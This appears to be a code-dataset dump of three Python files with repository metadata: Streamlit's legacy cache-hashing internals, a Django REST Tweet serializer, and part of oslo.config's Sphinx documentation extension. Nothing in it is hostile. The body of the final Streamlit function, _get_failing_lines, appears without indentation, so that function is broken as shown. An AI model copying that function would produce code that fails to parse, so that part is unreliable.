        the generic IOBase branches below.
        """
        if isinstance(obj, unittest.mock.Mock):
            # Mock objects can appear to be infinitely
            # deep, so we don't try to hash them at all.
            return self.to_bytes(id(obj))
        elif isinstance(obj, (bytes, bytearray)):
            return obj
        elif type_util.get_fqn_type(obj) in self._hash_funcs:
            # Escape hatch for unsupported objects
            hash_func = self._hash_funcs[type_util.get_fqn_type(obj)]
            try:
                output = hash_func(obj)
            except BaseException as e:
                raise UserHashError(e, obj, hash_func=hash_func)
            return self.to_bytes(output)
        elif isinstance(obj, str):
            return obj.encode()
        elif isinstance(obj, float):
            return self.to_bytes(hash(obj))
        elif isinstance(obj, int):
            return _int_to_bytes(obj)
        elif isinstance(obj, (list, tuple)):
            h = hashlib.new("md5")
            for item in obj:
                self.update(h, item, context)
            return h.digest()
        elif isinstance(obj, dict):
            h = hashlib.new("md5")
            for item in obj.items():
                self.update(h, item, context)
            return h.digest()
        elif obj is None:
            return b"0"
        elif obj is True:
            return b"1"
        elif obj is False:
            return b"0"
        elif type_util.is_type(obj, "pandas.core.frame.DataFrame") or type_util.is_type(
            obj, "pandas.core.series.Series"
        ):
            import pandas as pd

            # Large frames are sampled (deterministically, via random_state=0)
            # before hashing to bound cost.
            if len(obj) >= _PANDAS_ROWS_LARGE:
                obj = obj.sample(n=_PANDAS_SAMPLE_SIZE, random_state=0)
            try:
                return b"%s" % pd.util.hash_pandas_object(obj).sum()
            except TypeError:
                # Use pickle if pandas cannot hash the object for example if
                # it contains unhashable objects.
                return b"%s" % pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
        elif type_util.is_type(obj, "numpy.ndarray"):
            h = hashlib.new("md5")
            self.update(h, obj.shape)
            # Large arrays are sampled (deterministic seed) before hashing.
            if obj.size >= _NP_SIZE_LARGE:
                import numpy as np

                state = np.random.RandomState(0)
                obj = state.choice(obj.flat, size=_NP_SAMPLE_SIZE)
            self.update(h, obj.tobytes())
            return h.digest()
        elif inspect.isbuiltin(obj):
            return bytes(obj.__name__.encode())
        elif any(type_util.is_type(obj, typename) for typename in _FFI_TYPE_NAMES):
            return self.to_bytes(None)
        elif type_util.is_type(obj, "builtins.mappingproxy") or type_util.is_type(
            obj, "builtins.dict_items"
        ):
            return self.to_bytes(dict(obj))
        elif type_util.is_type(obj, "builtins.getset_descriptor"):
            return bytes(obj.__qualname__.encode())
        elif isinstance(obj, UploadedFile):
            # UploadedFile is a BytesIO (thus IOBase) but has a name.
            # It does not have a timestamp so this must come before
            # temproary files
            h = hashlib.new("md5")
            self.update(h, obj.name)
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()
        elif hasattr(obj, "name") and isinstance(
            obj, (io.IOBase, tempfile._TemporaryFileWrapper)
        ):
            # Hash files as name + last modification date + offset.
            # NB: we're using hasattr("name") to differentiate between
            # on-disk and in-memory StringIO/BytesIO file representations.
            # That means that this condition must come *before* the next
            # condition, which just checks for StringIO/BytesIO.
            h = hashlib.new("md5")
            obj_name = getattr(obj, "name", "wonthappen")  # Just to appease MyPy.
            self.update(h, obj_name)
            self.update(h, os.path.getmtime(obj_name))
            self.update(h, obj.tell())
            return h.digest()
        elif isinstance(obj, Pattern):
            return self.to_bytes([obj.pattern, obj.flags])
        elif isinstance(obj, (io.StringIO, io.BytesIO)):
            # Hash in-memory StringIO/BytesIO by their full contents
            # and seek position.
            h = hashlib.new("md5")
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()
        elif any(
            type_util.get_fqn(x) == "sqlalchemy.pool.base.Pool"
            for x in type(obj).__bases__
        ):
            # Get connect_args from the closure of the creator function. It includes
            # arguments parsed from the URL and those passed in via `connect_args`.
            # However if a custom `creator` function is passed in then we don't
            # expect to get this data.
            cargs = obj._creator.__closure__
            cargs = [cargs[0].cell_contents, cargs[1].cell_contents] if cargs else None
            # Sort kwargs since hashing dicts is sensitive to key order
            if cargs:
                cargs[1] = dict(
                    collections.OrderedDict(
                        sorted(cargs[1].items(), key=lambda t: t[0])  # type: ignore
                    )
                )
            reduce_data = obj.__reduce__()
            # Remove thread related objects
            for attr in [
                "_overflow_lock",
                "_pool",
                "_conn",
                "_fairy",
                "_threadconns",
                "logger",
            ]:
                reduce_data[2].pop(attr, None)
            return self.to_bytes([reduce_data, cargs])
        elif type_util.is_type(obj, "sqlalchemy.engine.base.Engine"):
            # Remove the url because it's overwritten by creator and connect_args
            reduce_data = obj.__reduce__()
            reduce_data[2].pop("url", None)
            reduce_data[2].pop("logger", None)
            return self.to_bytes(reduce_data)
        elif type_util.is_type(obj, "numpy.ufunc"):
            # For numpy.remainder, this returns remainder.
            return bytes(obj.__name__.encode())
        elif type_util.is_type(obj, "socket.socket"):
            return self.to_bytes(id(obj))
        elif any(
            type_util.get_fqn(x) == "torch.nn.modules.module.Module"
            for x in type(obj).__bases__
        ):
            return self.to_bytes(id(obj))
        elif type_util.is_type(obj, "tensorflow.python.client.session.Session"):
            return self.to_bytes(id(obj))
        elif type_util.is_type(obj, "torch.Tensor") or type_util.is_type(
            obj, "torch._C._TensorBase"
        ):
            return self.to_bytes([obj.detach().numpy(), obj.grad])
        elif any(type_util.is_type(obj, typename) for typename in _KERAS_TYPE_NAMES):
            return self.to_bytes(id(obj))
        elif type_util.is_type(
            obj,
            "tensorflow.python.saved_model.load.Loader._recreate_base_user_object.<locals>._UserObject",
        ):
            return self.to_bytes(id(obj))
        elif inspect.isroutine(obj):
            wrapped = getattr(obj, "__wrapped__", None)
            if wrapped is not None:
                # Ignore the wrapper of wrapped functions.
                return self.to_bytes(wrapped)
            if obj.__module__.startswith("streamlit"):
                # Ignore streamlit modules even if they are in the CWD
                # (e.g. during development).
                return self.to_bytes("%s.%s" % (obj.__module__, obj.__name__))
            h = hashlib.new("md5")
            code = getattr(obj, "__code__", None)
            assert code is not None
            if self._file_should_be_hashed(code.co_filename):
                context = _get_context(obj)
                defaults = getattr(obj, "__defaults__", None)
                if defaults is not None:
                    self.update(h, defaults, context)
                h.update(self._code_to_bytes(code, context, func=obj))
            else:
                # Don't hash code that is not in the current working directory.
                self.update(h, obj.__module__)
                self.update(h, obj.__name__)
            return h.digest()
        elif inspect.iscode(obj):
            if context is None:
                raise RuntimeError("context must be defined when hashing code")
            return self._code_to_bytes(obj, context)
        elif inspect.ismodule(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # so the current warning is quite annoying...
            # st.warning(('Streamlit does not support hashing modules. '
            # 'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name for internal modules.
            return self.to_bytes(obj.__name__)
        elif inspect.isclass(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # (e.g. in every "except" statement) so the current warning is
            # quite annoying...
            # st.warning(('Streamlit does not support hashing classes. '
            # 'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name of classes.
            return self.to_bytes(obj.__name__)
        elif isinstance(obj, functools.partial):
            # The return value of functools.partial is not a plain function:
            # it's a callable object that remembers the original function plus
            # the values you pickled into it. So here we need to special-case it.
            h = hashlib.new("md5")
            self.update(h, obj.args)
            self.update(h, obj.func)
            self.update(h, obj.keywords)
            return h.digest()
        else:
            # As a last resort, hash the output of the object's __reduce__ method
            h = hashlib.new("md5")
            try:
                reduce_data = obj.__reduce__()
            except BaseException as e:
                raise UnhashableTypeError(e, obj)
            for item in reduce_data:
                self.update(h, item, context)
            return h.digest()

    def _code_to_bytes(self, code, context: Context, func=None) -> bytes:
        """Hash a code object: its bytecode, constants, and referenced objects."""
        h = hashlib.new("md5")
        # Hash the bytecode.
        self.update(h, code.co_code)
        # Hash constants that are referenced by the bytecode but ignore names of lambdas.
        consts = [
            n
            for n in code.co_consts
            if not isinstance(n, str) or not n.endswith(".<lambda>")
        ]
        self.update(h, consts, context)
        # Frame this code object's cell/free vars while resolving references.
        context.cells.push(code, func=func)
        for ref in get_referenced_objects(code, context):
            self.update(h, ref, context)
        context.cells.pop()
        return h.digest()

    @staticmethod
    def _get_main_script_directory() -> str:
        """Get the directory of the main script."""
        import __main__
        import os

        # This works because we set __main__.__file__ to the
        # script path in ScriptRunner.
        main_path = __main__.__file__
        return str(os.path.dirname(main_path))
def get_referenced_objects(code, context: Context) -> List[Any]:
    """Return the objects referenced by a code object's bytecode.

    Walks the disassembled instructions, tracking a simulated top-of-stack
    (tos) so that attribute chains like ``foo.bar`` resolve to the ``bar``
    attribute of the actual ``foo`` object instead of two unrelated names.
    Names are resolved against context.globals, context.cells and
    context.varnames; names that cannot be resolved are recorded as strings.
    """
    # Top of the stack
    tos: Any = None
    lineno = None
    refs: List[Any] = []

    def set_tos(t):
        nonlocal tos
        if tos is not None:
            # Hash tos so we support reading multiple objects
            refs.append(tos)
        tos = t

    # Our goal is to find referenced objects. The problem is that co_names
    # does not have full qualified names in it. So if you access `foo.bar`,
    # co_names has `foo` and `bar` in it but it doesn't tell us that the
    # code reads `bar` of `foo`. We are going over the bytecode to resolve
    # from which object an attribute is requested.
    # Read more about bytecode at https://docs.python.org/3/library/dis.html
    for op in dis.get_instructions(code):
        try:
            # Sometimes starts_line is None, in which case let's just remember the
            # previous start_line (if any). This way when there's an exception we at
            # least can point users somewhat near the line where the error stems from.
            if op.starts_line is not None:
                lineno = op.starts_line
            if op.opname in ["LOAD_GLOBAL", "LOAD_NAME"]:
                if op.argval in context.globals:
                    set_tos(context.globals[op.argval])
                else:
                    set_tos(op.argval)
            elif op.opname in ["LOAD_DEREF", "LOAD_CLOSURE"]:
                set_tos(context.cells.values[op.argval])
            elif op.opname == "IMPORT_NAME":
                try:
                    set_tos(importlib.import_module(op.argval))
                except ImportError:
                    set_tos(op.argval)
            elif op.opname in ["LOAD_METHOD", "LOAD_ATTR", "IMPORT_FROM"]:
                if tos is None:
                    refs.append(op.argval)
                elif isinstance(tos, str):
                    # Still unresolved: extend the dotted-name string.
                    tos += "." + op.argval
                else:
                    tos = getattr(tos, op.argval)
            elif op.opname == "DELETE_FAST" and tos:
                del context.varnames[op.argval]
                tos = None
            elif op.opname == "STORE_FAST" and tos:
                context.varnames[op.argval] = tos
                tos = None
            elif op.opname == "LOAD_FAST" and op.argval in context.varnames:
                set_tos(context.varnames[op.argval])
            else:
                # For all other instructions, hash the current TOS.
                if tos is not None:
                    refs.append(tos)
                    tos = None
        except Exception as e:
            raise UserHashError(e, code, lineno=lineno)

    return refs
class NoResult:
    """Placeholder class for return values when None is meaningful."""

    pass
class UnhashableTypeError(StreamlitAPIException):
    """Raised when an object cannot be hashed and no hash_funcs override applies."""

    def __init__(self, orig_exc, failed_obj):
        msg = self._get_message(orig_exc, failed_obj)
        super(UnhashableTypeError, self).__init__(msg)
        # Preserve the original traceback so users see where hashing failed.
        self.with_traceback(orig_exc.__traceback__)

    def _get_message(self, orig_exc, failed_obj):
        """Build a Markdown error message describing the unhashable object."""
        args = _get_error_message_args(orig_exc, failed_obj)
        # This needs to have zero indentation otherwise %(hash_stack)s will
        # render incorrectly in Markdown.
        return (
            """
Cannot hash object of type `%(failed_obj_type_str)s`, found in %(object_part)s
%(object_desc)s.
While caching %(object_part)s %(object_desc)s, Streamlit encountered an
object of type `%(failed_obj_type_str)s`, which it does not know how to hash.
To address this, please try helping Streamlit understand how to hash that type
by passing the `hash_funcs` argument into `@st.cache`. For example:
```
@st.cache(hash_funcs={%(failed_obj_type_str)s: my_hash_func})
def my_func(...):
    ...
```
If you don't know where the object of type `%(failed_obj_type_str)s` is coming
from, try looking at the hash chain below for an object that you do recognize,
then pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
Please see the `hash_funcs` [documentation]
(https://docs.streamlit.io/library/advanced-features/caching#the-hash_funcs-parameter)
for more details.
            """
            % args
        ).strip("\n")
class UserHashError(StreamlitAPIException):
    """Raised when a user-supplied hash_func, or user code being hashed, throws."""

    def __init__(self, orig_exc, cached_func_or_code, hash_func=None, lineno=None):
        # Report under the original exception's class name.
        self.alternate_name = type(orig_exc).__name__
        # Two flavors: the failure happened inside a user hash_func, or inside
        # the user's own code while we were resolving references for hashing.
        if hash_func:
            msg = self._get_message_from_func(orig_exc, cached_func_or_code, hash_func)
        else:
            msg = self._get_message_from_code(orig_exc, cached_func_or_code, lineno)
        super(UserHashError, self).__init__(msg)
        self.with_traceback(orig_exc.__traceback__)

    def _get_message_from_func(self, orig_exc, cached_func, hash_func):
        """Build the message for a failure inside a user-defined hash_func."""
        args = _get_error_message_args(orig_exc, cached_func)
        if hasattr(hash_func, "__name__"):
            args["hash_func_name"] = "`%s()`" % hash_func.__name__
        else:
            args["hash_func_name"] = "a function"
        return (
            """
%(orig_exception_desc)s
This error is likely due to a bug in %(hash_func_name)s, which is a
user-defined hash function that was passed into the `@st.cache` decorator of
%(object_desc)s.
%(hash_func_name)s failed when hashing an object of type
`%(failed_obj_type_str)s`. If you don't know where that object is coming from,
try looking at the hash chain below for an object that you do recognize, then
pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
If you think this is actually a Streamlit bug, please [file a bug report here.]
(https://github.com/streamlit/streamlit/issues/new/choose)
            """
            % args
        ).strip("\n")

    def _get_message_from_code(self, orig_exc: BaseException, cached_code, lineno: int):
        """Build the message for a failure raised by user code during hashing."""
        args = _get_error_message_args(orig_exc, cached_code)
        failing_lines = _get_failing_lines(cached_code, lineno)
        failing_lines_str = "".join(failing_lines)
        failing_lines_str = textwrap.dedent(failing_lines_str).strip("\n")
        args["failing_lines_str"] = failing_lines_str
        args["filename"] = cached_code.co_filename
        args["lineno"] = lineno
        # This needs to have zero indentation otherwise %(lines_str)s will
        # render incorrectly in Markdown.
        return (
            """
%(orig_exception_desc)s
Streamlit encountered an error while caching %(object_part)s %(object_desc)s.
This is likely due to a bug in `%(filename)s` near line `%(lineno)s`:
```
%(failing_lines_str)s
```
Please modify the code above to address this.
If you think this is actually a Streamlit bug, you may [file a bug report
here.] (https://github.com/streamlit/streamlit/issues/new/choose)
            """
            % args
        ).strip("\n")
class InternalHashError(MarkdownFormattedException):
    """Exception in Streamlit hashing code (i.e. not a user error)"""

    def __init__(self, orig_exc: BaseException, failed_obj: Any):
        msg = self._get_message(orig_exc, failed_obj)
        super(InternalHashError, self).__init__(msg)
        # Preserve the original traceback for debugging.
        self.with_traceback(orig_exc.__traceback__)

    def _get_message(self, orig_exc: BaseException, failed_obj: Any) -> str:
        """Build a Markdown message pointing users at the bug tracker and hash_funcs."""
        args = _get_error_message_args(orig_exc, failed_obj)
        # This needs to have zero indentation otherwise %(hash_stack)s will
        # render incorrectly in Markdown.
        return (
            """
%(orig_exception_desc)s
While caching %(object_part)s %(object_desc)s, Streamlit encountered an
object of type `%(failed_obj_type_str)s`, which it does not know how to hash.
**In this specific case, it's very likely you found a Streamlit bug so please
[file a bug report here.]
(https://github.com/streamlit/streamlit/issues/new/choose)**
In the meantime, you can try bypassing this error by registering a custom
hash function via the `hash_funcs` keyword in @st.cache(). For example:
```
@st.cache(hash_funcs={%(failed_obj_type_str)s: my_hash_func})
def my_func(...):
    ...
```
If you don't know where the object of type `%(failed_obj_type_str)s` is coming
from, try looking at the hash chain below for an object that you do recognize,
then pass that to `hash_funcs` instead:
```
%(hash_stack)s
```
Please see the `hash_funcs` [documentation]
(https://docs.streamlit.io/library/advanced-features/caching#the-hash_funcs-parameter)
for more details.
            """
            % args
        ).strip("\n")
def _get_error_message_args(orig_exc: BaseException, failed_obj: Any) -> Dict[str, Any]:
    """Build the substitution dict shared by the hashing error messages.

    Returns the keys: orig_exception_desc, failed_obj_type_str, hash_stack,
    object_desc ("`func()`", "a function", "a code block", or "something"),
    and object_part ("the arguments of", "the body of", "the return value
    of", or "").

    Fix vs. original: removed the dead locals `additional_explanation` and
    `object_desc_specific`, which were assigned but never used.
    """
    hash_reason = hash_stacks.current.hash_reason
    hash_source = hash_stacks.current.hash_source

    failed_obj_type_str = type_util.get_fqn_type(failed_obj)

    if hash_source is None or hash_reason is None:
        object_desc = "something"
        object_part = ""
    elif hash_reason is HashReason.CACHING_BLOCK:
        object_desc = "a code block"
        object_part = ""
    else:
        if hasattr(hash_source, "__name__"):
            object_desc = "`%s()`" % hash_source.__name__
        else:
            object_desc = "a function"

        if hash_reason is HashReason.CACHING_FUNC_ARGS:
            object_part = "the arguments of"
        elif hash_reason is HashReason.CACHING_FUNC_BODY:
            object_part = "the body of"
        elif hash_reason is HashReason.CACHING_FUNC_OUTPUT:
            object_part = "the return value of"

    return {
        "orig_exception_desc": str(orig_exc),
        "failed_obj_type_str": failed_obj_type_str,
        "hash_stack": hash_stacks.current.pretty_print(),
        "object_desc": object_desc,
        "object_part": object_part,
    }
def _get_failing_lines(code, lineno: int) -> List[str]:
"""Get list of strings (lines of code) from lineno to lineno+3.
Ideally we'd return the exact line where the error took place, but there
are reasons why this is not possible without a lot of work, including
playing with the AST. So for now we're returning 3 lines near where
the error took place.
"""
source_lines, source_lineno = inspect.getsourcelines(code)
start = lineno - source_lineno
end = min(start + 3, len(source_lines))
return source_lines[start:end]
| 34.754195
| 104
| 0.624354
|
4a1115a86af9b4d937d0f783a2f3f934bf1771c5
| 189
|
py
|
Python
|
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | 1
|
2020-12-21T14:42:17.000Z
|
2020-12-21T14:42:17.000Z
|
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | null | null | null |
twitter/tweets/serializers.py
|
yasminhillis/twitter-clone-django-react
|
c4027ed3f9a738c4cf123f735c4a78b1eb4a9245
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from tweets.models import Tweet
class TweetSerializer(serializers.ModelSerializer):
    """DRF serializer exposing every field of the Tweet model."""

    class Meta:
        model = Tweet
        # '__all__' auto-includes all fields declared on Tweet.
        fields = '__all__'
| 27
| 51
| 0.740741
|
4a1116335dd065f4ae6dc2605dc2937bbf408ff2
| 17,620
|
py
|
Python
|
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/oslo_config/sphinxext.py
|
raghulnarayanasami/python
|
5caa6317458275ef3afbf3e16bef396b0f3c27b9
|
[
"bzip2-1.0.6"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst import directives
from docutils.statemachine import ViewList
import oslo_i18n
from sphinx import addnodes
from sphinx.directives import ObjectDescription
from sphinx.domains import Domain
from sphinx.domains import ObjType
from sphinx.roles import XRefRole
from sphinx.util import logging
from sphinx.util.nodes import make_refnode
from sphinx.util.nodes import nested_parse_with_titles
from oslo_config import cfg
from oslo_config import generator
LOG = logging.getLogger(__name__)
def _list_table(headers, data, title='', columns=None):
"""Build a list-table directive.
:param add: Function to add one row to output.
:param headers: List of header values.
:param data: Iterable of row data, yielding lists or tuples with rows.
"""
yield '.. list-table:: %s' % title
yield ' :header-rows: 1'
if columns:
yield ' :widths: %s' % (','.join(str(c) for c in columns))
yield ''
yield ' - * %s' % headers[0]
for h in headers[1:]:
yield ' * %s' % h
for row in data:
yield ' - * %s' % row[0]
for r in row[1:]:
yield ' * %s' % r
def _indent(text, n=2):
padding = ' ' * n
# we don't want to indent blank lines so just output them as-is
return '\n'.join(padding + x if x else '' for x in text.splitlines())
def _make_anchor_target(group_name, option_name):
    """Build a documentation-wide unique anchor id for a group/option pair.

    Anchors must be unique across the entire documentation set:
    http://www.sphinx-doc.org/en/stable/markup/inline.html#ref-role
    """
    normalized_group = cfg._normalize_group_name(group_name)
    return '%s.%s' % (normalized_group, option_name.lower())
# Map each oslo.config option class to the human-readable type label that
# _format_opt() shows in the generated ":Type:" field.
_TYPE_DESCRIPTIONS = {
    cfg.StrOpt: 'string',
    cfg.BoolOpt: 'boolean',
    cfg.IntOpt: 'integer',
    cfg.FloatOpt: 'floating point',
    cfg.ListOpt: 'list',
    cfg.DictOpt: 'dict',
    cfg.MultiStrOpt: 'multi-valued',
    cfg.IPOpt: 'ip address',
    cfg.PortOpt: 'port number',
    cfg.HostnameOpt: 'hostname',
    cfg.URIOpt: 'URI',
    cfg.HostAddressOpt: 'host address',
    cfg._ConfigFileOpt: 'list of filenames',
    cfg._ConfigDirOpt: 'list of directory names',
}
def _get_choice_text(choice):
if choice is None:
return '<None>'
elif choice == '':
return "''"
return str(choice)
def _format_opt(opt, group_name):
    """Emit the rST lines documenting a single configuration option.

    :param opt: The option (a cfg.Opt instance or compatible object).
    :param group_name: Name of the group the option belongs to; used as
        the fallback group in the deprecated-variations table.
    """
    opt_type = _TYPE_DESCRIPTIONS.get(type(opt),
                                      'unknown type')
    yield '.. oslo.config:option:: %s' % opt.dest
    yield ''
    yield _indent(':Type: %s' % opt_type)
    for default in generator._format_defaults(opt):
        if default:
            yield _indent(':Default: ``%s``' % default)
        else:
            # Render falsy defaults (None, '', 0, ...) via repr so they
            # remain visible in the output.
            yield _indent(':Default: ``%r``' % default)
    if getattr(opt.type, 'min', None) is not None:
        yield _indent(':Minimum Value: %s' % opt.type.min)
    if getattr(opt.type, 'max', None) is not None:
        yield _indent(':Maximum Value: %s' % opt.type.max)
    if getattr(opt.type, 'choices', None):
        choices_text = ', '.join([_get_choice_text(choice)
                                  for choice in opt.type.choices])
        yield _indent(':Valid Values: %s' % choices_text)
    try:
        if opt.mutable:
            yield _indent(
                ':Mutable: This option can be changed without restarting.'
            )
    except AttributeError as err:
        # NOTE(dhellmann): keystoneauth defines its own Opt class,
        # and neutron (at least) returns instances of those
        # classes instead of oslo_config Opt instances. The new
        # mutable attribute is the first property where the API
        # isn't supported in the external class, so we can use
        # this failure to emit a warning. See
        # https://bugs.launchpad.net/keystoneauth/+bug/1548433 for
        # more details.
        import warnings
        # BUGFIX: the isinstance() arguments were reversed
        # (isinstance(cfg.Opt, opt)), which raises TypeError because the
        # second argument must be a class. The intent is to warn when
        # *opt* is not an oslo_config Opt instance.
        if not isinstance(opt, cfg.Opt):
            warnings.warn(
                'Incompatible option class for %s (%r): %s' %
                (opt.dest, opt.__class__, err),
            )
        else:
            warnings.warn('Failed to fully format sample for %s: %s' %
                          (opt.dest, err))
    if opt.advanced:
        yield _indent(
            ':Advanced Option: Intended for advanced users and not used')
        yield _indent(
            'by the majority of users, and might have a significant', 6)
        yield _indent(
            'effect on stability and/or performance.', 6)
    if opt.sample_default:
        yield _indent(
            '')
        yield _indent(
            'This option has a sample default set, which means that')
        yield _indent(
            'its actual default value may vary from the one documented')
        yield _indent(
            'above.')
    try:
        # Let help text reference its default via %(default)s.
        help_text = opt.help % {'default': 'the value above'}
    except (TypeError, KeyError, ValueError):
        # There is no mention of the default in the help string,
        # the string had some unknown key, or the string contained
        # invalid formatting characters
        help_text = opt.help
    if help_text:
        yield ''
        for line in help_text.strip().splitlines():
            yield _indent(line.rstrip())
    # We don't bother outputting this if not using new-style choices with
    # inline descriptions
    if getattr(opt.type, 'choices', None) and not all(
            x is None for x in opt.type.choices.values()):
        yield ''
        yield _indent('.. rubric:: Possible values')
        for choice in opt.type.choices:
            yield ''
            yield _indent(_get_choice_text(choice))
            yield _indent(_indent(
                opt.type.choices[choice] or '<No description provided>'))
    if opt.deprecated_opts:
        yield ''
        for line in _list_table(
                ['Group', 'Name'],
                ((d.group or group_name,
                  d.name or opt.dest or 'UNSET')
                 for d in opt.deprecated_opts),
                title='Deprecated Variations'):
            yield _indent(line)
    if opt.deprecated_for_removal:
        yield ''
        yield _indent('.. warning::')
        if opt.deprecated_since:
            yield _indent('   This option is deprecated for removal '
                          'since %s.' % opt.deprecated_since)
        else:
            yield _indent('   This option is deprecated for removal.')
        yield _indent('   Its value may be silently ignored ')
        yield _indent('   in the future.')
    if opt.deprecated_reason:
        reason = ' '.join([x.strip() for x in
                           opt.deprecated_reason.splitlines()])
        yield ''
        yield _indent('   :Reason: ' + reason)
    yield ''
def _format_group(namespace, group_name, group_obj):
yield '.. oslo.config:group:: %s' % group_name
if namespace:
yield ' :namespace: %s' % namespace
yield ''
if group_obj and group_obj.help:
for line in group_obj.help.strip().splitlines():
yield _indent(line.rstrip())
yield ''
def _format_group_opts(namespace, group_name, group_obj, opt_list):
    """Emit rST for a group header followed by each of its options."""
    group_name = group_name or 'DEFAULT'
    LOG.debug('%s %s', namespace, group_name)
    yield from _format_group(namespace, group_name, group_obj)
    for opt in opt_list:
        yield from _format_opt(opt, group_name)
def _format_option_help(namespaces, split_namespaces):
    """Generate a series of lines of restructuredtext.

    Format the option help for the given namespaces as restructuredtext
    and yield it line by line. When *split_namespaces* is false, options
    from different namespaces that share a group are merged.
    """
    discovered = generator._list_opts(namespaces)
    if split_namespaces:
        for namespace, group_list in discovered:
            for group, group_opts in group_list:
                if isinstance(group, cfg.OptGroup):
                    group_name = group.name
                else:
                    group_name = group
                    group = None
                if group_name is None:
                    group_name = 'DEFAULT'
                yield from _format_group_opts(
                    namespace=namespace,
                    group_name=group_name,
                    group_obj=group,
                    opt_list=group_opts,
                )
    else:
        # Merge the options from different namespaces that belong to
        # the same group together and format them without the
        # namespace.
        by_section = {}
        group_objs = {}
        for _namespace, group_list in discovered:
            for group, group_opts in group_list:
                if isinstance(group, cfg.OptGroup):
                    group_name = group.name
                else:
                    group_name = group
                    group = None
                if group_name is None:
                    group_name = 'DEFAULT'
                group_objs.setdefault(group_name, group)
                by_section.setdefault(group_name, []).extend(group_opts)
        for group_name, merged_opts in sorted(by_section.items()):
            yield from _format_group_opts(
                namespace=None,
                group_name=group_name,
                group_obj=group_objs.get(group_name),
                opt_list=merged_opts,
            )
class ShowOptionsDirective(rst.Directive):
    """Sphinx directive ``show-options``: render option docs for namespaces.

    Namespaces come either from an oslo.config generator config file
    (``:config-file:`` option) or from the directive body, one namespace
    per line.
    """
    option_spec = {
        'split-namespaces': directives.flag,
        'config-file': directives.unchanged,
    }
    has_content = True
    def run(self):
        split_namespaces = 'split-namespaces' in self.options
        config_file = self.options.get('config-file')
        if config_file:
            LOG.info('loading config file %s', config_file)
            # Reuse the generator's own option schema to read the
            # namespace list out of the generator config file.
            conf = cfg.ConfigOpts()
            conf.register_opts(generator._generator_opts)
            conf(
                args=['--config-file', config_file],
                project='oslo.config.sphinxext',
            )
            namespaces = conf.namespace[:]
        else:
            # Fall back to the directive body: one namespace per line.
            namespaces = [
                c.strip()
                for c in self.content
                if c.strip()
            ]
        result = ViewList()
        source_name = self.state.document.current_source
        for count, line in enumerate(_format_option_help(
                namespaces, split_namespaces)):
            result.append(line, source_name, count)
            LOG.debug('%5d%s%s', count, ' ' if line else '', line)
        node = nodes.section()
        node.document = self.state.document
        # With the resolution for bug #1755783, we now parse the 'Opt.help'
        # attribute as rST. Unfortunately, there are a lot of broken option
        # descriptions out there and we don't want to break peoples' builds
        # suddenly. As a result, we disable 'warning-is-error' temporarily.
        # Users will still see the warnings but the build will continue.
        with logging.skip_warningiserror():
            nested_parse_with_titles(self.state, result, node)
        return node.children
class ConfigGroupXRefRole(XRefRole):
    "Handles :oslo.config:group: roles pointing to configuration groups."
    def __init__(self):
        # warn_dangling makes Sphinx report references to unknown groups.
        super(ConfigGroupXRefRole, self).__init__(
            warn_dangling=True,
        )
    def process_link(self, env, refnode, has_explicit_title, title, target):
        # The anchor for the group link is the group name.
        return target, target
class ConfigOptXRefRole(XRefRole):
    "Handles :oslo.config:option: roles pointing to configuration options."
    def __init__(self):
        # warn_dangling makes Sphinx report references to unknown options.
        super(ConfigOptXRefRole, self).__init__(
            warn_dangling=True,
        )
    def process_link(self, env, refnode, has_explicit_title, title, target):
        """Resolve ``[group.]option`` references to their anchor target."""
        if not has_explicit_title:
            title = target
        if '.' in target:
            # BUGFIX: split on the first '.' only, matching
            # ConfigDomain.resolve_xref; a bare split('.') raised
            # ValueError for targets containing more than one dot.
            group, opt_name = target.split('.', 1)
        else:
            group = 'DEFAULT'
            opt_name = target
        anchor = _make_anchor_target(group, opt_name)
        return title, anchor
class ConfigGroup(rst.Directive):
    """Directive ``oslo.config:group``: declare a configuration group.

    Renders a titled section for the group and records which document
    defines it so group cross-references can be resolved later.
    """
    required_arguments = 1
    optional_arguments = 0
    has_content = True
    option_spec = {
        'namespace': directives.unchanged,
    }
    def run(self):
        env = self.state.document.settings.env
        group_name = self.arguments[0]
        namespace = self.options.get('namespace')
        cached_groups = env.domaindata['oslo.config']['groups']
        # Store the current group for use later in option directives
        env.temp_data['oslo.config:group'] = group_name
        LOG.debug('oslo.config group %s' % group_name)
        # Store the location where this group is being defined
        # for use when resolving cross-references later.
        # FIXME: This should take the source namespace into account, too
        cached_groups[group_name] = env.docname
        result = ViewList()
        source_name = '<' + __name__ + '>'
        def _add(text):
            "Append some text to the output result view to be parsed."
            result.append(text, source_name)
        if namespace:
            title = '%s: %s' % (namespace, group_name)
        else:
            title = group_name
        # Emit the title with an underline so nested parsing creates a
        # real section node, then append the directive body verbatim.
        _add(title)
        _add('-' * len(title))
        _add('')
        for line in self.content:
            _add(line)
        node = nodes.section()
